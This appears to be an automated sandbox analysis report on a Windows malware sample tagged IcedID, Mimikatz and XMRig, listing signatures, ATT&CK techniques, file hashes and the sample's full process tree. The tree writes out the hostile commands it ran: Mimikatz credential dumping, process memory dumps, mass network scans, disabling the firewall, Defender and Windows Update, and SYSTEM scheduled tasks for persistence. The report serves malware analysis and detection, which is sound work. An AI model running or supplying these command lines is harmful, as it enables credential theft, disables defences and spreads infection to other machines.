Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
10-11-2024 06:50
General
-
Target
2024-11-10_e863ba48b8e3892ac794285a946809bd_hacktools_icedid_mimikatz.exe
-
Size
7.1MB
-
MD5
e863ba48b8e3892ac794285a946809bd
-
SHA1
f542bcaee57eeb1153f93924a914349c80685502
-
SHA256
c7aeaa05d65b5a52313fe395f1b63dd5f1b2afa13e86f183a375d4fa0c68cb34
-
SHA512
cdf29c264bb37e776ee6277195c8cef31d104788ce8b562b2b12464e8be60add376826b6748b3fd8b2d6661ca98b5cfd56d202db863892e780ebd604d03cfb4f
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (29577) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 28 IoCs
-
Loads dropped DLL 12 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
UPX packed file 36 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\swsbcbmeu\bssyne.exe"C:\Windows\TEMP\swsbcbmeu\bssyne.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-10_e863ba48b8e3892ac794285a946809bd_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-10_e863ba48b8e3892ac794285a946809bd_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\nsyinawm\bytszzu.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\nsyinawm\bytszzu.exeC:\Windows\nsyinawm\bytszzu.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\nsyinawm\bytszzu.exeC:\Windows\nsyinawm\bytszzu.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vuqibqfqb\ieymcmqub\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\vuqibqfqb\ieymcmqub\wpcap.exeC:\Windows\vuqibqfqb\ieymcmqub\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vuqibqfqb\ieymcmqub\hbnqbyuem.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\vuqibqfqb\ieymcmqub\Scant.txt2⤵
-
C:\Windows\vuqibqfqb\ieymcmqub\hbnqbyuem.exeC:\Windows\vuqibqfqb\ieymcmqub\hbnqbyuem.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\vuqibqfqb\ieymcmqub\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vuqibqfqb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\vuqibqfqb\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\vuqibqfqb\Corporate\vfshost.exeC:\Windows\vuqibqfqb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qsyirlhey" /ru system /tr "cmd /c C:\Windows\ime\bytszzu.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "qsyirlhey" /ru system /tr "cmd /c C:\Windows\ime\bytszzu.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nabgiiueh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nabgiiueh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bmefekubb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bmefekubb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 788 C:\Windows\TEMP\vuqibqfqb\788.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 384 C:\Windows\TEMP\vuqibqfqb\384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2088 C:\Windows\TEMP\vuqibqfqb\2088.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2648 C:\Windows\TEMP\vuqibqfqb\2648.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2744 C:\Windows\TEMP\vuqibqfqb\2744.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2772 C:\Windows\TEMP\vuqibqfqb\2772.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 2896 C:\Windows\TEMP\vuqibqfqb\2896.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3844 C:\Windows\TEMP\vuqibqfqb\3844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3940 C:\Windows\TEMP\vuqibqfqb\3940.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 4000 C:\Windows\TEMP\vuqibqfqb\4000.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 4092 C:\Windows\TEMP\vuqibqfqb\4092.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3520 C:\Windows\TEMP\vuqibqfqb\3520.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 684 C:\Windows\TEMP\vuqibqfqb\684.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 1624 C:\Windows\TEMP\vuqibqfqb\1624.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3628 C:\Windows\TEMP\vuqibqfqb\3628.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 3060 C:\Windows\TEMP\vuqibqfqb\3060.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vuqibqfqb\eybsetuye.exeC:\Windows\TEMP\vuqibqfqb\eybsetuye.exe -accepteula -mp 5092 C:\Windows\TEMP\vuqibqfqb\5092.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\vuqibqfqb\ieymcmqub\scan.bat2⤵
-
C:\Windows\vuqibqfqb\ieymcmqub\lmsemquci.exelmsemquci.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\rwdxsq.exeC:\Windows\SysWOW64\rwdxsq.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\bytszzu.exe1⤵
-
C:\Windows\ime\bytszzu.exeC:\Windows\ime\bytszzu.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\bytszzu.exe1⤵
-
C:\Windows\ime\bytszzu.exeC:\Windows\ime\bytszzu.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\swsbcbmeu\bssyne.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\nsyinawm\bytszzu.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
8.5MB
MD567510b1cce73bafc90349bb0122aeb71
SHA1212def6b68a0e529d13b93cca9c891a2b45cf2bf
SHA2564aa9fa28d2d3349427b08cacb829db7356c15c521dc67368907bd0d74eb17832
SHA512d18485de4fea585cc99da6cb314d9f5d62646cf3ddf273a74e52bf0e2eb790e33bb4b5482060cbd508835582c95a1c32df2756f5f2af4fbba25b34c07387a552
-
Filesize
4.1MB
MD575a4dce3c7ee5ebeb1ccd0b84cbd251a
SHA1ee179d7ab411c5ec40d3c53146ae2c5a57138178
SHA25677f4fd820ff7a2fcba06b3f2358aa6c62ada59329ef8b1b1abc3742d94e4645f
SHA512217fbba6aae7d22eda9c5b38d35da48e7c81389777ae2582a42a8ac592dc8dbff08bf4f0284140c0e671db5481fb6c54736dffc0ec28694ad41cd159f6aeeb8c
-
Filesize
3.7MB
MD5aecaf77f80414c35cb72e54248f948b0
SHA1a96f44dad3fb62cea5a58730027bc314abfc6dc4
SHA256260b425feb1dc71c27229e3f7d545697ba3af91d654b49fd6320d84b5afc361e
SHA512d5d00c4a8a7de6f2a130b4fbbde3cf265d481383239dd1734494389108b4e21c487c2d65037991edaf5071f401385c01caa26f3e4e1fb716b962e5defa18ef7a
-
Filesize
2.9MB
